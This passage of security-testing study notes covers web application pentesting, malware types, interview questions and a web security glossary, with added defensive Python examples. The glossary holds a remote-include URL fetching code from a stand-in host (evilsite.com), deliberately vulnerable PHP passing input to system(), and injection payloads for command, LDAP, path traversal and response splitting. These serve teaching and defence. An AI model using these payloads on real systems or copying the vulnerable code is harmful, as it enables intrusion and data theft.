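The two lists above are what an interviewer wants to hear; a practitioner also wants a way to check that steps 3 and 5 (remove default scripts/data, fix ownership and permissions) actually hold on a deployed server. The following is an added example, not code from the interview document: a small Python audit of a document root that flags world-writable entries, leftover sample scripts, editor/backup copies, and (optionally) files owned by the account the web server runs as. The list of sample file names and the backup suffixes are assumptions, as is the constructed fixture directory used for the demo.

```python
"""Audit a web server document root for leftover default content and loose
permissions (added example; file names and fixture are assumptions)."""
import os
import stat
import tempfile
from typing import List, Optional, Tuple

# Assumption: names that commonly ship as samples or test scripts with a web
# server and should not be present in a production document root.
DEFAULT_CONTENT = {"printenv", "test-cgi", "phpinfo.php", "info.php"}
# Editor backups and copies of configuration files are a classic leak of
# source or credentials and fall under "delete default data and scripts".
BACKUP_SUFFIXES = (".bak", ".old", ".orig", "~")


def audit_docroot(root: str, service_uid: Optional[int] = None) -> List[Tuple[str, str]]:
    """Walk *root* and return (finding_kind, path) pairs.

    service_uid, if given, is the uid the web server process runs as. Files it
    owns are flagged because a compromised server process could then rewrite
    its own content; content should be owned by a separate deployment account
    and be read-only to the service account.
    """
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            st = os.lstat(path)
            if st.st_mode & stat.S_IWOTH:
                findings.append(("world-writable", path))
            if service_uid is not None and st.st_uid == service_uid:
                findings.append(("owned-by-service-account", path))
            if name in DEFAULT_CONTENT:
                findings.append(("default-content", path))
            elif name.endswith(BACKUP_SUFFIXES):
                findings.append(("backup-file", path))
    return findings


def _write(path: str, text: str, mode: int) -> None:
    with open(path, "w") as fh:
        fh.write(text)
    os.chmod(path, mode)


def make_sample_docroot() -> str:
    """Constructed fixture: a tiny document root with one problem of each kind."""
    root = tempfile.mkdtemp(prefix="docroot-")
    cgi_bin = os.path.join(root, "cgi-bin")
    uploads = os.path.join(root, "uploads")
    os.makedirs(cgi_bin)
    os.makedirs(uploads)
    os.chmod(cgi_bin, 0o755)
    _write(os.path.join(root, "index.html"), "<html>ok</html>\n", 0o644)
    _write(os.path.join(cgi_bin, "printenv"), "#!/bin/sh\nenv\n", 0o755)   # sample CGI
    _write(os.path.join(root, "config.php.bak"), "<?php $db_pass = 'x';\n", 0o644)
    os.chmod(uploads, 0o777)   # world-writable directory under the docroot
    return root


if __name__ == "__main__":
    sample = make_sample_docroot()
    for kind, path in audit_docroot(sample):
        print(f"{kind:25s} {path}")
```

Run it against the real document root (for example `audit_docroot("/var/www/html", service_uid=pwd.getpwnam("www-data").pw_uid)`, an assumed path and account) after each deployment; an empty result is the expected state.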

1.13.3 Web Application Penetration Testing

A web application or webapp is an application that is accessed via a web browser over a
network such as the Internet or an intranet. It is also a computer software application
that is coded in a browser-supported language (such as HTML, JavaScript, Java, etc.) and
reliant on a common web browser to render the application executable.
Analysis shows that
• 1% of the bugs (programming errors) cause 50% of security problems
• If configured right, information systems can survive almost all attacks
Application security deals with checking applications for vulnerabilities and ensuring
that secure methods are followed to remove these security flaws at all stages of the SDLC.

What are the threats?


• denial-of-service
• unauthorized use or misuse of computing systems
• loss/alteration/compromise of data or software
• monetary/financial loss
• loss or endangerment of human life
• loss of trust in computer/network system
• loss of public confidence

Who are the threats?


• Competitors
• Hackers
• Corporate Spies
• Disgruntled Employees
• Careless Employees
• Professional Thieves
• Visitors

Security Testing:
In order to find vulnerabilities in web applications we need to identify them.
Methods:
Code audit (a lot of work), also referred to as White Box Testing
Testing (manual or automated), also referred to as Black Box Testing
Manual testing: a human being attacks a web application using his experience,
knowledge and tools
Automated testing: a human being uses an automated vulnerability scanner to attack a
web application
Security Testing helps to understand the extent to which a system/application can protect
itself from unauthorized access, hacking, cracking, any code damage, etc.
• Verify and validate that applications meet the security requirements
• Identify security vulnerabilities of applications in the given environment
This type of testing needs sophisticated testing techniques.

Posted by atlurianupama at 02:09

1.13.4 Virus,Trojan,Worm
Virus: A computer virus is a small program written to alter the way a computer operates,
without the permission or knowledge of the user. A virus must meet two criteria:

• It must execute itself. It often places its own code in the path of execution of another
program.
• It must replicate itself. For example, it may replace other executable files with a
copy of the virus infected file. Viruses can infect desktop computers and network
servers alike.

Some viruses are programmed to damage the computer by damaging programs, deleting
files, or reformatting the hard disk. Others are not designed to do any damage, but simply
to replicate themselves and make their presence known by presenting text, video, and
audio messages. Even these benign viruses can create problems for the computer user.
They typically take up computer memory used by legitimate programs. As a result, they
often cause erratic behavior and can result in system crashes. In addition, many viruses
are bug-ridden, and these bugs may lead to system crashes and data loss.

Five recognized types of viruses:

File infector viruses: File infector viruses infect program files. These viruses normally infect executable code, such as
.com and .exe files. They can infect other files when an infected program is run from floppy, hard drive, or from the
network. Many of these viruses are memory resident. After memory becomes infected, any noninfected executable that
runs becomes infected. Examples of known file infector viruses include Jerusalem and Cascade.

Boot sector viruses:Boot sector viruses infect the system area of a disk; that is, the boot record on floppy disks and
hard disks. All floppy disks and hard disks (including disks containing only data) contain a small program in the boot
record that is run when the computer starts up. Boot sector viruses attach themselves to this part of the disk and activate
when the user attempts to start up from the infected disk. These viruses are always memory resident in nature. Most
were written for DOS, but, all PCs, regardless of the operating system, are potential targets of this type of virus. All that
is required to become infected is to attempt to start up your computer with an infected floppy disk Thereafter, while the
virus remains in memory, all floppy disks that are not write protected will become infected when the floppy disk is
accessed. Examples of boot sector viruses are Form, Disk Killer, Michelangelo, and Stoned.

Master boot record viruses: Master boot record viruses are memory-resident viruses that infect disks in the same
manner as boot sector viruses. The difference between these two virus types is where the viral code is located. Master
boot record infectors normally save a legitimate copy of the master boot record in a different location. Windows NT
computers that become infected by either boot sector viruses or master boot record viruses will not boot. This is due to
the difference in how the operating system accesses its boot information, as compared to Windows 98/Me. If your
Windows NT system is formatted with FAT partitions you can usually remove the virus by booting to DOS and using
antivirus software. If the boot partition is NTFS, the system must be recovered by using the three Windows NT Setup
disks. Examples of master boot record infectors are NYB, AntiExe, and Unashamed.

Multipartite viruses: Multipartite (also known as polypartite) viruses infect both boot records and program files. These
are particularly difficult to repair. If the boot area is cleaned, but the files are not, the boot area will be reinfected. The
same holds true for cleaning infected files. If the virus is not removed from the boot area, any files that you have
cleaned will be reinfected. Examples of multipartite viruses include One_Half, Emperor, Anthrax and Tequila.

Macro viruses:These types of viruses infect data files. They are the most common and have cost corporations the most
money and time trying to repair. With the advent of Visual Basic in Microsoft's Office 97, a macro virus can be written
that not only infects data files, but also can infect other files as well. Macro viruses infect Microsoft Office Word,
Excel, PowerPoint and Access files. Newer strains are now turning up in other programs as well. All of these viruses
use another program's internal programming language, which was created to allow users to automate certain tasks
within that program. Because of the ease with which these viruses can be created, there are now thousands of them in
circulation. Examples of macro viruses include W97M.Melissa, WM.NiceDay and W97M.Groov.

Trojan horses: These are impostors—files that claim to be something desirable but, in
fact, are malicious. A very important distinction between Trojan horse programs and true
viruses is that they do not replicate themselves. Trojan horses contain malicious code that
when triggered cause loss, or even theft, of data. For a Trojan horse to spread, you must
invite these programs onto your computers; for example, by opening an email attachment
or downloading and running a file from the Internet. Trojan.Vundo is a Trojan horse.

Worm: Worms are programs that replicate themselves from system to system without
the use of a host file. This is in contrast to viruses, which require the spreading of an
infected host file. Although worms generally exist inside of other files, often Word or
Excel documents, there is a difference between how worms and viruses use the host file.
Usually the worm will release a document that already has the "worm" macro inside the
document. The entire document will travel from computer to computer, so the entire
document should be considered the worm. W32.Mydoom.AX@mm is an example of a
worm.
Posted by atlurianupama at 02:01

1.13.5 Security/Penetration Testing Interview Questions


• What type of security testing have you performed?
• What types of web testing security problems do you know?
• Please classify vulnerabilities that you know.
• What are two common techniques used to protect a password file?
• What is integer overflow?
• What is your understanding of root causes of vulnerabilities?
• What is ISO 17799?
• Can you describe security defect prevention?
• List and briefly define three classes of intruders.
• What are three benefits that can be provided by an intrusion detection
system?
• What services are provided by the SSL Record Protocol?
• Why do we need to validate user input for length and characters?
• Why do we need to keep track of individual users and authentication?
• What is runtime inspection?
• Describe, with examples, fuzzer and sniffer tools.
• Define buffer overflows.
• What are format string vulnerabilities?
• What is SQL injection?
• Provide example of command injection.
• Provide example of broken access control.
• List and briefly define the parameters that define an SSL session state.
• List and briefly define the parameters that define an SSL session connection.
• Why do we need port scanning?
• How to use an interactive proxy and a set of fuzz strings to manually test the
application’s handling of data?
• What is cookie gathering?
• What is a honeypot?
• What is a phishing attack?
• What is a dual signature and what is its purpose?
• How can you ensure that all input fields are properly validated to prevent code
injection attacks?
• What tools can you use to validate the strength of SID (session ID)?
• What is file enumeration?
• What steps are involved in the SSL Record Protocol transmission?
• What are hidden fields in HTTP?
• What protocols comprise SSL?
• How to implement (create) a custom fuzz utility and test it against your
application?
• Describe SOAP and WSDL.
• List and briefly define the principal categories of SET participants.

Posted by atlurianupama at 01:54

1.13.7 Important Security Terminology


Abuse of Functionality: An attack technique that uses the features and
functionality of a web site to consume, defraud, or circumvent the site’s access
controls. See also “Denial of Service”.
ActiveX controls: A program, called a “control”, developed using ActiveX
technologies. ActiveX controls can be downloaded and executed within
technology-enabled Web browsers. ActiveX is a set of rules for how
applications should share information. ActiveX controls can be developed in
C, C++, Visual Basic, and Java. See also “Java”, “Java Applets”, “JavaScript”, “Web
Browser”.
AJAX: AJAX stands for Asynchronous JavaScript and XML. This browser based
technology allows a website to perform additional resource requests without
refreshing the user page by utilizing the XMLHttpRequest Javascript object.
Anti-Automation: Security measure that prevents automated programs from
exercising web site functionality by administering the Turing Test to a user, which
only a human could pass. See also “Visual Verification”.
Application Server: A software server, normally using HTTP, which has the ability
to execute dynamic web applications. Also known as middleware, this piece of
software is normally installed on or near the web server where it can be called upon.
See also “Web Application”, “Web Server”.
Authentication: The process of verifying the identity or location of a user, service
or application. Authentication is performed using at least one of three mechanisms:
“something you have”, “something you know” or “something you are”. The
authenticating application may provide different services based on the location,
access method, time of day, etc. See also “Insufficient Authentication”.
Authorization: The determination of what resources a user, service or application
has permission to access. Accessible resources can be URL’s, files, directories,
servlets, databases, execution paths, etc. See also “Insufficient Authorization”.
Basic Authentication: A simple form of client-side authentication supported in
HTTP. The http-client sends a request header to the web server containing a Base64
encoded username and password. If the username/password combination is valid,
the web server grants the client access to the requested resource. See also
“Authentication”, “Insufficient Authentication”.
Brute Force: An automated process of trial and error used to guess the “secret”
protecting a system. Examples of these secrets include usernames, passwords or
cryptographic keys. See also “Authentication”, “Insufficient Authentication”,
“Password Recovery System”, “Weak Password Recovery Validation”.
Buffer Overflow: An exploitation technique that alters the flow of an application by
overwriting parts of memory. Buffer Overflows are a common cause of
malfunctioning software. If the data written into a buffer exceeds its size, adjacent
memory space will be corrupted and normally produce a fault. An attacker may be
able to utilize a buffer overflow situation to alter an application’s process flow.
Overfilling the buffer and rewriting memory-stack pointers could be used to execute
arbitrary operating-system commands.
CGI Scanner: Automated security program that searches for well-known
vulnerabilities in web servers and off-the-shelf web application software. Often CGI
Scanners are not very “stateful” in their analysis and only test a series of HTTP
requests against known CGI strings. See also, “Web Application Vulnerability
Scanner.”
CGI Security: (Obsolete) See “Web Application Security”.
Client-Side Scripting: Web browser feature that extends the functionality and
interactivity of static HyperText markup language (HTML) web pages. Examples of
Client-Side Scripting languages are JavaScript, JScript and VBScript. See also
“ActiveX controls”, “Java Applets”.
Common Gateway Interface: (Acronym - CGI) Programming standard for software
to interface and execute applications residing on web servers. See also “Web
Application”, “Application Server”, “Web Server”.
Configuration File Disclosure: (Obsolete) See “Predictable File Location”.
Content Spoofing: An attack technique used to trick a user into thinking that fake
web site content is legitimate data.
Cookie: Small amount of data sent by the web server, to a web client, which can be
stored and retrieved at a later time. Typically cookies are used to keep track of a
user’s state as they traverse a web site. See also “Cookie Manipulation”.
Cookie Manipulation: Altering or modification of cookie values, on the client’s web
browser, to exploit security issues within a web application. Attackers will normally
manipulate cookie values to fraudulently authenticate themselves to a web site. This
is an example of the problem of trusting the user to provide reasonable input. See
also “Cookie”.
Code Injection: The general name for many types of attack which depend on
inserting code that is then interpreted by the application. Such an attack may be
performed by adding strings of characters into a cookie or into argument values in the
URI. This attack makes use of a lack of accurate input/output data validation, for
example:
Example 1
If a site uses the include() function, which operates on variables sent with the GET method, and
there is no validation performed on them, then the attacker may try to execute code other than
what the author of the code had in mind.
The URL below displays information about how to contact the testsite company.
http://testsite.com/index.php?page=contact.php
In the altered URL below, the included code is instead fetched from http://evilsite.com/evilcode.php. The script "evilcode.php"
may contain, for example, a phpinfo() function, which is useful for gaining information about the
configuration of the environment in which the web service runs.
http://testsite.com/?page=http://evilsite.com/evilcode.php
Example 3
<?php
// Deliberately vulnerable (as in the original): the untrusted "pageid" parameter is
// concatenated straight into a shell command line, so shell metacharacters in it run.
$varerror = system('cat '.$_GET['pageid'], $valoretorno);
echo $varerror;
?>
With code like this, the attack shown in example number 2 is possible: using Live HTTP Headers,
or simply the GET method, a request of this kind can be made:
vulnerable.php?pageid=loquesea;ls
ls is the command being executed here, but any other command available on the server could be used.
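Both examples above fail for the same reason: the page parameter is passed, unvalidated, to something that interprets it (include() in example 1, the shell behind system() in example 3). The following is an added example, not part of the original glossary and not the vulnerable project's own code, showing the safe counterpart in Python: the parameter is matched against a strict allowlist, mapped to a file under one fixed directory, and read directly rather than through a shell or a remote include. `PAGE_DIR`, the `.php` suffix convention and the constructed sample page are assumptions.

```python
"""Safe handling of a 'page' request parameter (added example; PAGE_DIR and
the sample page are assumptions, not part of the original page)."""
import os
import re
import tempfile

PAGE_DIR = "/var/www/pages"  # assumption: directory holding the includable pages

# Only a short name of letters, digits, '-' and '_' is accepted. This rejects
# ';ls' style shell metacharacters, URLs, '../' and NUL bytes alike. fullmatch
# is used because '$' would still let a trailing newline through.
_PAGE_NAME = re.compile(r"[A-Za-z0-9_-]{1,64}")


def is_valid_pageid(pageid: str) -> bool:
    """True when *pageid* is on the allowlist of acceptable page names."""
    return _PAGE_NAME.fullmatch(pageid) is not None


def resolve_page(pageid: str, page_dir: str = PAGE_DIR) -> str:
    """Map *pageid* to a file path inside *page_dir*, or raise ValueError."""
    if not is_valid_pageid(pageid):
        raise ValueError(f"rejected page id: {pageid!r}")
    base = os.path.realpath(page_dir)
    path = os.path.realpath(os.path.join(base, pageid + ".php"))
    # Defence in depth: even after the allowlist, refuse anything that
    # resolved outside page_dir (for example through a symlink).
    if os.path.dirname(path) != base:
        raise ValueError("page path escapes the page directory")
    return path


def render_page(pageid: str, page_dir: str = PAGE_DIR) -> str:
    """Read the page with a plain file open: no 'cat', no shell, no remote URL."""
    with open(resolve_page(pageid, page_dir), encoding="utf-8") as fh:
        return fh.read()


def make_sample_page_dir() -> str:
    """Constructed fixture: one legitimate page, mirroring the contact.php example."""
    d = tempfile.mkdtemp(prefix="pages-")
    with open(os.path.join(d, "contact.php"), "w", encoding="utf-8") as fh:
        fh.write("<p>Contact: info@testsite.com</p>\n")
    return d


if __name__ == "__main__":
    pages = make_sample_page_dir()
    print(render_page("contact", pages).strip())
    for attempt in ("loquesea;ls", "http://evilsite.com/evilcode.php", "../../etc/passwd"):
        try:
            render_page(attempt, pages)
        except ValueError as exc:
            print("blocked:", exc)
```

Note that with this allowlist the request would carry `page=contact` rather than `page=contact.php`; the extension is added server-side so the client never chooses a file name. If a subprocess really is required, pass the arguments as a list (`subprocess.run(["cat", path])`) so that the shell is never involved.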
Cookie Poisoning: (Obsolete) See “Cookie Manipulation”.
Cross-Site Scripting: (Acronym – XSS) An attack technique that forces a web site
to echo client-supplied data, which then executes in a user’s web browser. When a user is
Cross-Site Scripted, the attacker will have access to all web browser content
(cookies, history, application version, etc). See also “Client-Side Scripting”.
Debug Commands: Application debugging features or commands that assist in
identifying programming errors during the software development process.
Denial of Service: (Acronym – DoS) An attack technique that consumes all of a
web site’s available resources with the intent of rendering legitimate use impossible.
Resources include CPU time, memory utilization, bandwidth, disk space, etc. When
any of these resources reach full capacity, the system will normally be inaccessible to
normal user activity. See also “Abuse of Functionality”.
Directory Browsing: (Obsolete) See “Directory Indexing”.
Directory Enumeration: (Obsolete) See “Predictable File Location”.
Directory Indexing: A feature common to most popular web servers, that exposes
contents of a directory when no index page is present. See also “Predictable File
Location”.
Directory Traversal: A technique used to exploit web sites by accessing files and
commands beyond the document root directory. Most web sites restrict user access
to a specific portion of the file-system, typically called the document root directory or
CGI root directory. These directories contain the files and executables intended for
public use. In most cases, a user should not be able to access any files beyond this
point.
DOM Based Cross Site Scripting: DOM based cross-site scripting (or "DOM based
XSS" in short) is a “cross-site scripting” attack that makes use of insecure Javascript
(or in general, client side) programming that takes place in response pages, to
effectively incur an XSS condition. In DOM based XSS, the attacker affects the
Javascript execution in a target page (in the attacked domain) by providing it with
data in the URL or the Referer, which the script insecurely uses. The script may apply
the eval() function to the malicious data, or embed it in the DOM (thus making the
browser potentially render it as Javascript and run it). This is in contrast to
"standard" XSS, where the malicious data is embedded into the page at the server
side. In some cases, DOM based XSS can even be conducted in such a way that the
malicious payload doesn’t even reach the server, which makes this attack more
unobtrusive.
Encoding Attacks: An exploitation technique that aids an attack by changing the
format of user-supplied data to bypass sanity checking filters. See also “Null
Injection”.
Filename Manipulation: An attack technique used to exploit web sites by
manipulating URL filenames to cause application errors, discover hidden content, or
display the source code of an application. See also “Predictable File Location”.
Filter-Bypass Manipulation: See “Encoding Attacks”.
Forced Browsing: See “Predictable File Location”.
Form Field Manipulation: Altering or modification of HTML Form-Field input values
or HTTP post-data to exploit security issues within a web application. See also
“Parameter Tampering”, “Cookie Manipulation”.
Format String Attack: An exploit technique that alters the flow of an application by
using string formatting library features to access other memory space.
Frame Spoofing: (Obsolete) See “Content Spoofing”.
HyperText Transfer Protocol: (Acronym – HTTP) A protocol scheme used on the
World Wide Web. HTTP describes the way a web-client requests data and how a web
server responds to those requests. See also “Web Server”, “Web Browser”.
HTTP Request Smuggling: HTTP Request Smuggling works by taking advantage of
the discrepancies in parsing when one or more HTTP devices/entities (e.g. cache
server, proxy server, web application firewall, etc.) are in the data flow between the
user and the web server. HTTP Request Smuggling enables various attacks such as “web
cache poisoning”, “session hijacking” and “cross-site scripting”, as well as the ability to
bypass web application firewall protection. The attacker sends multiple specially-
crafted HTTP requests that cause the two attacked entities (e.g. a proxy server and a
web server, or a firewall and a web server) to see two different sets of requests,
allowing the hacker to smuggle a request to one device without the other device
being aware of it.
HTTP Response Smuggling: HTTP response smuggling is an enhancement of the
basic “HTTP response splitting” technique, which can evade anti- HTTP response
splitting measures. HTTP response smuggling makes use of “HTTP request
smuggling”-like techniques to exploit the discrepancies between what an anti- HTTP
Response Splitting mechanism would consider to be the HTTP response stream, and
the response stream as parsed by a proxy server (or a browser). So, while an anti-
HTTP response splitting mechanism may consider a particular response stream
harmless (single HTTP response), a proxy/browser may still parse it as two HTTP
responses, and hence be susceptible to all the outcomes of the original HTTP
response splitting technique. For example, some anti- HTTP response splitting
mechanisms in use by some application engines forbid the application from inserting
a header containing CR+LF to the response. Yet an attacker can force the application
to insert a header containing CRs, thereby circumventing the defense mechanism.
Some proxy servers may still treat CR (only) as a header (and response) separator,
and as such the combination of web server and proxy server will still be vulnerable to
an attack that may poison the proxy’s cache.
HTTP Response Splitting: An HTTP response splitting attack causes the web server
to send out two HTTP responses, where it typically only sends out one HTTP
response (hence the name - "response splitting"). This can be described as HTTP
response injection, and is typically conducted by injecting malicious data into an
HTTP response header, and using CR+LF characters to shape and terminate the first
response, and then completely shape and control the additional response. Having
this second, "unexpected" response enables the attacker to fool a client that receives
this extra response by forcing this client to first emit a second request. The client
then matches the second, attacker-controlled response to the second, attacker-
controlled request. The net result (looking at the second request-response pair) is
that the client is forced to send an arbitrary request to the vulnerable server, and in
response, the client receives an arbitrary response crafted by the attacker. This
condition enables “cross-site scripting” and “cache poisoning”.
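The two entries above make one concrete point worth seeing in code: a defence that only forbids the CR+LF pair is defeated by a value containing bare CRs, because a lenient proxy or browser treats a lone CR as a line ending too. The following is an added example, not from the original glossary: a naive and a strict header-value check, a redirect builder that applies one of them, and a small CR-tolerant response parser that counts how many responses a lenient intermediary would see. The Location payload and the parser are constructed for illustration; the function names are not from any real server or library.

```python
"""Response splitting via bare CR and its detection (added example; payload,
parser and names are constructed for illustration)."""
import re


def naive_header_safe(value: str) -> bool:
    """The weak defence from the glossary: forbid only the exact CR+LF sequence."""
    return "\r\n" not in value


def strict_header_safe(value: str) -> bool:
    """Refuse any CR, LF or NUL in a header value, however they are combined."""
    return re.search(r"[\r\n\x00]", value) is None


def build_redirect(location: str, check=strict_header_safe) -> bytes:
    """Emit a 302 whose Location header carries *location*, after running *check*."""
    if not check(location):
        raise ValueError("control characters in header value")
    head = "HTTP/1.1 302 Found\r\nLocation: " + location + "\r\nContent-Length: 0\r\n\r\n"
    return head.encode("latin-1")


# A lenient parser accepts CRLF, bare LF or bare CR as a line ending. The
# lookahead stops a single CRLF from being read as two separate endings.
_EOL = r"(?:\r\n|\r(?!\n)|\n)"
_LINE_END = re.compile(_EOL.encode())
_BLANK_LINE = re.compile((_EOL + _EOL).encode())


def count_responses(stream: bytes) -> int:
    """Count the HTTP responses a CR-tolerant parser finds in *stream*.

    Each response is a status line plus headers up to a blank line; a
    Content-Length body is skipped so the next status line can be found.
    """
    count, pos = 0, 0
    while pos < len(stream):
        blank = _BLANK_LINE.search(stream, pos)
        if blank is None:
            break
        head = stream[pos:blank.start()]
        if not head.startswith(b"HTTP/"):
            break
        count += 1
        body_len = 0
        for line in _LINE_END.split(head)[1:]:
            name, _, val = line.partition(b":")
            if name.strip().lower() == b"content-length":
                body_len = int(val.strip() or 0)
        pos = blank.end() + body_len
    return count


# Constructed attacker-controlled Location value. It uses bare CR only, so it
# passes naive_header_safe, yet it terminates the first response and supplies
# a complete second one (17-byte body), as in the cache-poisoning scenario.
SMUGGLED_LOCATION = (
    "/home\rContent-Length: 0\r\r"
    "HTTP/1.1 200 OK\rContent-Type: text/html\rContent-Length: 17\r\r"
    "<html>evil</html>"
)

if __name__ == "__main__":
    print("naive filter accepts payload:", naive_header_safe(SMUGGLED_LOCATION))
    print("strict filter accepts payload:", strict_header_safe(SMUGGLED_LOCATION))
    print("responses seen by a lenient parser:",
          count_responses(build_redirect(SMUGGLED_LOCATION, check=naive_header_safe)))
```

The defensive rule that follows is the strict one: reject (or percent-encode) every CR, LF and NUL in any value that ends up in a response header, regardless of what the application framework already filters, and treat a lone CR in a header value as a finding when reviewing logs or proxy traffic.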
Information Leakage: When a web site reveals sensitive data, such as developer
comments or error messages, which aids an attacker in exploiting the system. See
also “Verbose Messages”.
Insufficient Authentication: When a web site permits an attacker to access
sensitive content or functionality without verifying their identity. See also
“Authentication”.
Insufficient Authorization: When a web site permits an attacker to access
sensitive content or functionality that should require increased access control
restrictions. See also “Authorization”.
Insufficient Session Expiration: When a web site permits an attacker to reuse old
session credentials or session ID’s for authorization. See also “Session Replay”,
“Session Credential”, “Session ID”, “Session Manipulation”.
Insufficient Process Validation: When a web site permits an attacker to bypass or
circumvent the intended flow control of an application.
Java: A popular programming language developed by Sun Microsystems(tm). See
also “ActiveX controls”, “Web Browser”, “JavaScript”, “Client-Side Scripting”.
Java Applets: An applet is a program written in the Java programming language
that can be included in a web page. When a Java enabled web browser views a page
containing an applet, the code is executed by the Java Virtual Machine (JVM). See
also “Web Browser”, “Java”, “ActiveX controls”, “JavaScript”, “Client-Side Scripting”.
JavaScript: A popular web browser client-side scripting language used to create
dynamic web page content. See also “ActiveX controls”, “Java Applets”, “Client-Side
Scripting”.
Known CGI file: See “Predictable File Location”.
Known Directory: See “Predictable File Location”.
LDAP Injection: A technique for exploiting a web site by altering backend LDAP
statements through manipulating application input. The methodology is similar to
that of SQL Injection. See also “Parameter Tampering”, “Form Field Manipulation”.
Example 1
In a page with a user search form, the following code is responsible for catching the input value
and generating an LDAP query that will be used against the LDAP database.
<input type="text" size=20 name="userName">Insert the username</input>
The LDAP query is narrowed down for performance and the underlying code for this
function might be the following:
String ldapSearchQuery = "(cn=" + $userName + ")";
System.out.println(ldapSearchQuery);
If the variable $userName is not validated, it could be possible to accomplish LDAP
injection, as follows:
• If a user puts “*” in the search box, the system may return all the usernames in the LDAP
base
• If a user puts “jonys) (| (password = * ) )”, it will generate the code below, revealing
jonys’ password: ( cn = jonys ) ( | (password = * ) )
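The fix for the query above is to escape the user-supplied value before it is placed in the filter, so that `*`, parentheses and backslashes are matched literally instead of being parsed as filter syntax. The following is an added example, not from the original glossary, that applies the RFC 4515 escaping rules to the `(cn=<userName>)` query and adds a check counting the filter components in the resulting string (one for a plain cn lookup, more when input has broken out of the value). The function names and the inputs are constructed for illustration.

```python
"""Escaping user input for an LDAP search filter (added example; names and
inputs constructed for illustration)."""
import re

# RFC 4515 filter escaping: each of these characters is replaced by a
# backslash and two hex digits so it is matched literally, never parsed.
_LDAP_ESCAPES = {
    "\\": r"\5c",
    "*": r"\2a",
    "(": r"\28",
    ")": r"\29",
    "\x00": r"\00",
}


def ldap_escape(value: str) -> str:
    """Escape *value* for use as an assertion value inside an LDAP filter."""
    return "".join(_LDAP_ESCAPES.get(ch, ch) for ch in value)


def build_user_filter(user_name: str) -> str:
    """Safe form of  "(cn=" + $userName + ")"  from the example above."""
    return "(cn=" + ldap_escape(user_name) + ")"


def build_user_filter_unsafe(user_name: str) -> str:
    """The original, unescaped concatenation, kept only for comparison."""
    return "(cn=" + user_name + ")"


def count_filter_components(ldap_filter: str) -> int:
    """Number of unescaped '(' in the filter. A single cn lookup has exactly
    one; a larger count means the input has grown into extra components."""
    return re.sub(r"\\[0-9A-Fa-f]{2}", "", ldap_filter).count("(")


if __name__ == "__main__":
    for user_name in ("jonys", "*", "jonys) (| (password = * ) )"):
        print(build_user_filter_unsafe(user_name), "->", build_user_filter(user_name))
```

Escaping is the necessary step; the complementary one is to run the search with a bind account that is not allowed to read the password attribute at all, so that even a malformed filter cannot disclose it.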
Meta-Character Injection: An attack technique used to exploit web sites by
sending in meta-characters, which have special meaning to a web application, as
data input. Meta-characters are characters that have special meaning to
programming languages, operating system commands, individual program
procedures, database queries, etc. These special characters can adversely alter the
behavior of a web application. See also “Null Injection”, “Parameter Tampering”,
“SQL Injection”, “LDAP Injection”, “Cross-Site Scripting”.
Null Injection: An exploitation technique used to bypass sanity-checking filters by
adding URL-encoded null-byte characters to user-supplied data. When developers
create web applications in a variety of programming languages, these web
applications often pass data to underlying lower-level C functions for further
processing and functionality. If a user-supplied string contains a null character (\0),
the web application may stop processing the string at the point of the null. Null
Injection is a form of Meta-Character Injection attack. See also “Encoding Attacks”,
“Parameter Tampering”, “Meta-Character Injection”.
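As an added example that is not part of the original document, the Python below shows the failure mode the entry describes: a suffix check performed on the still-encoded value passes, while the decoded string a C routine would see stops at the null byte. The hardened check decodes first and rejects NUL bytes before looking at the extension. Function names and the sample file names are constructed.

```python
# Added example (not from the original document): checking a user-supplied file
# name only after URL-decoding it, and rejecting NUL bytes outright. Function
# names and the sample inputs are constructed for illustration.
from urllib.parse import unquote


def naive_suffix_check(raw: str, allowed_suffix: str = ".jpg") -> bool:
    """Checks the extension on the still-encoded value: the weak pattern."""
    return raw.endswith(allowed_suffix)


def as_seen_by_c(raw: str) -> str:
    """What a C string routine sees after decoding: everything before the first NUL."""
    return unquote(raw).split("\x00", 1)[0]


def is_safe_filename(raw: str, allowed_suffix: str = ".jpg") -> bool:
    """Decode first, then refuse NUL bytes, path separators and traversal,
    and only then check the extension against the decoded value."""
    decoded = unquote(raw)
    if "\x00" in decoded:
        return False
    if "/" in decoded or "\\" in decoded or ".." in decoded:
        return False
    return decoded.endswith(allowed_suffix)


if __name__ == "__main__":
    for sample in ["photo.jpg", "report%00.jpg", "..%2Fphoto.jpg"]:
        print(sample, "naive:", naive_suffix_check(sample),
              "c-level:", as_seen_by_c(sample), "safe:", is_safe_filename(sample))
```

The order matters: any validation that runs before decoding, or that trusts a string which a lower layer will truncate, is checking something other than what gets used.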
OS Command Injection: See “OS Commanding”.
OS Commanding: An attack technique used to exploit web sites by executing
operating-system commands through manipulating application input. See also
“Parameter Tampering”, “Form Field Manipulation”.
Page Sequencing: (Obsolete) See “Insufficient Process Validation”.
Parameter Tampering: Altering or modification of the parameter name and value
pairs in a URL. Also known as “URL Manipulation”. See also “Uniform Resource
Locator”.
Password Recovery System: An automated process that allows a user to recover
or reset his password in the event that it has been lost or forgotten. See also “Weak
Password Recovery Validation”.
Predictable File Location: A technique used to access hidden web site content or
functionality by making educated guesses, manually or automatically, of the names
and locations of files. Predictable file locations may include directories, CGI’s,
configuration files, backup files, temporary files, etc.
Secure Sockets Layer: (Acronym – SSL) An industry standard public-key protocol
used to create encrypted tunnels between two network-connected devices. See also
“Transport Layer Security”.
Session Credential: A string of data provided by the web server, normally stored
within a cookie or URL, which identifies a user and authorizes them to perform
various actions. See also “Session ID”.
Session Fixation: An attack technique that forces a user’s session credential or
session ID to an explicit value. See also “Session Credential”, “Session ID”.
Session Forging: See “Session Prediction”.
Session Hi-Jacking: The result of a user’s session being compromised by an
attacker. The attacker could reuse this stolen session to masquerade as the user.
See also “Session Prediction”, “Session Credential”, “Session ID”.
Session ID: A string of data provided by the web server, normally stored within a
cookie or URL. A Session ID tracks a user’s session, or perhaps just his current
session, as he traverses the web site.
Session Manipulation: An attack technique used to hi-jack another user’s session
by altering a session ID or session credential value. See also “Session Prediction”,
“Session Hi-Jacking”, “Session Credential”, “Session ID”.
Session Prediction: An attack technique used to create fraudulent session
credentials or guess other users’ current session IDs. If successful, an attacker could
reuse this stolen session to masquerade as another user. See also “Session
Credential”, “Session ID”, “Session Hi-Jacking”.
Session Replay: When a web site permits an attacker to reuse old session
credentials or session IDs for authorization. See also “Session ID”, “Session
Credential”, “Insufficient Session Expiration”.
Session Tampering: See “Session Manipulation”.
